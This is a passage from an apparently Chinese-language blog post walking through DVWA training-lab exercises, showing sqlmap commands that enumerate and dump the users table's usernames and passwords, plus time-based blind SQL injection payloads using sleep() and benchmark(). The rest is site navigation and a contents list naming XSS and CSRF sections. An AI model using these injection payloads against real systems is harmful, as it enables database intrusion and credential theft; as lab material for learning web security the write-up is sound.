<p><code>sqlmap.py -u &quot;http://quanyex.local.com/dvwa-master/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit#&quot; -p&quot;id&quot; --cookie &quot;security=low;PHPSESSID=2ghptdtrr6159ml6gt8ik7bu05&quot; -D dvwa --tables</code></p>
<p><img src="http://lulu.izliang.com/yty/sqlmap2.png" alt=""></p>
<p><code>sqlmap.py -u &quot;http://quanyex.local.com/dvwa-master/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit#&quot; -p&quot;id&quot; --cookie &quot;security=low;PHPSESSID=2ghptdtrr6159ml6gt8ik7bu05&quot; -D dvwa -T users --columns</code></p>
<p><img src="http://lulu.izliang.com/yty/sqlmap3.png" alt=""></p>
<p><code>sqlmap.py -u &quot;http://quanyex.local.com/dvwa-master/vulnerabilities/sqli_blind/?id=1&amp;Submit=Submit#&quot; -p&quot;id&quot; --cookie &quot;security=low;PHPSESSID=2ghptdtrr6159ml6gt8ik7bu05&quot; -D dvwa -T users -C &quot;user,password&quot; --dump</code></p>
<p><img src="http://lulu.izliang.com/yty/sqlmap4.png" alt=""></p>
<h2 id="medium-5"><a href="#medium-5" class="headerlink" title="medium"></a>medium</h2><p>与回显注入相似</p>
<p>测试sleep函数<code>1&#39; and sleep(if(length(database())=4,5,0)) --</code></p>
<p><img src="http://lulu.izliang.com/yty/yanshiceshi1.png" alt=""></p>
<p>测试benchmark函数<code>1&#39; and benchmark(if(length(database())=4,5000000,0),md5(&#39;test&#39;)); --</code></p>
<p><img src="http://lulu.izliang.com/yty/yanshizhuru2.png" alt=""></p>
<h2 id="high-5"><a href="#high-5" class="headerlink" title="high"></a>high</h2><p>与回显注入相似</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/DVWA/" rel="tag"># DVWA</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/03/12/%E5%AD%A6%E4%B9%A0%E8%BF%87%E7%A8%8B%E4%B8%AD%E8%AF%AD%E6%B3%95%E9%97%AE%E9%A2%98/" rel="next" title="学习过程中语法问题">
                <i class="fa fa-chevron-left"></i> 学习过程中语法问题
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/03/18/%E5%AD%98%E5%9C%A8%E7%9A%84%E7%96%91%E6%83%91/" rel="prev" title="存在的疑惑">
                存在的疑惑 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="https://ss2.bdstatic.com/70cFvnSh_Q1YnxGkpoWK1HF6hhy/it/u=1442298964,3218822834&fm=26&gp=0.jpg"
                alt="QuanYex" />
            
              <p class="site-author-name" itemprop="name">QuanYex</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">3</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">12</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#xss"><span class="nav-number">1.</span> <span class="nav-text">xss</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#存储型xss"><span class="nav-number">1.1.</span> <span class="nav-text">存储型xss</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#low"><span class="nav-number">1.1.1.</span> <span class="nav-text">low</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#medium"><span class="nav-number">1.1.2.</span> <span class="nav-text">medium</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#high"><span class="nav-number">1.1.3.</span> <span class="nav-text">high</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#反射型xss"><span class="nav-number">1.2.</span> <span class="nav-text">反射型xss</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#low-注意"><span class="nav-number">1.2.1.</span> <span class="nav-text">low(注意)</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#medium-1"><span class="nav-number">1.2.2.</span> <span class="nav-text">medium</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#high-1"><span class="nav-number">1.2.3.</span> <span class="nav-text">high</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#DOM型xss"><span class="nav-number">1.3.</span> <span class="nav-text">DOM型xss</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#low-1"><span class="nav-number">1.3.1.</span> <span class="nav-text">low</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#medium-2"><span class="nav-number">1.3.2.</span> <span class="nav-text">medium</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#high-2"><span class="nav-number">1.3.3.</span> <span class="nav-text">high</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#CSRF"><span class="nav-number">2.</span> <span class="nav-text">CSRF</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#low-2"><span class="nav-number">2.1.</span> <span class="nav-text">low</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#medium-3"><span class="nav-number">2.2.</span> <span class="nav-text">medium</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#high-3"><span class="nav-number">2.3.</span> <span class="nav-text">high</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SQl回显注入"><span class="nav-number">3.</span> <span class="nav-text">SQl回显注入</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#low-3"><span class="nav-number">3.1.</span> <span class="nav-text">low</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#手工注入"><span class="nav-number">3.1.1.</span> <span class="nav-text">手工注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sqlmap"><span class="nav-number">3.1.2.</span> <span class="nav-text">sqlmap</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#medium-4"><span class="nav-number">3.2.</span> <span class="nav-text">medium</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#手工注入-1"><span class="nav-number">3.2.1.</span> <span class="nav-text">手工注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sqlmap-1"><span class="nav-number">3.2.2.</span> <span class="nav-text">sqlmap</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#high-4"><span class="nav-number">3.3.</span> <span class="nav-text">high</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#手工注入-2"><span class="nav-number">3.3.1.</span> <span class="nav-text">手工注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sqlmap-2"><span class="nav-number">3.3.2.</span> <span class="nav-text">sqlmap</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SQL盲注"><span class="nav-number">4.</span> <span class="nav-text">SQL盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#low-4"><span class="nav-number">4.1.</span> <span class="nav-text">low</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#手工注入-3"><span class="nav-number">4.1.1.</span> <span class="nav-text">手工注入</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#sqlmap-3"><span class="nav-number">4.1.2.</span> <span class="nav-text">sqlmap</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#medium-5"><span class="nav-number">4.2.</span> <span class="nav-text">medium</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#high-5"><span class="nav-number">4.3.</span> <span class="nav-text">high</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">QuanYex</span>

  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
